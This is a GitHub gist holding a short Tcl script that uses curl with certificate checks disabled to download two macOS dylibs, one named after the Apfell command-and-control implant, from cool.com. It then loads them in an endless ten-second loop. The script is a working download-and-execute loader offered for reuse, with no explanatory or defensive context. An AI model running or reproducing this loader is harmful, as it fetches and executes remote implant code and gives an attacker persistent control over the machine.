Skip to content

Instantly share code, notes, and snippets.

@D00MFist
Last active February 23, 2022 02:42
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save D00MFist/c01af0c81987319a93dba76aacca7a0b to your computer and use it in GitHub Desktop.
Save D00MFist/c01af0c81987319a93dba76aacca7a0b to your computer and use it in GitHub Desktop.
download through curl in tcl
exec /usr/bin/curl -k "https://cool.com/dlopen.dylib" -o dlopen.dylib
exec /usr/bin/curl -k "https://cool.com/apfell.dylib" -o apfell.dylib
after 10000
set here [pwd]
set dl ${here}/dlopen.dylib
set yourlib ${here}/apfell.dylib
while True {
load $dl
dlopen $yourlib
after 10000
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment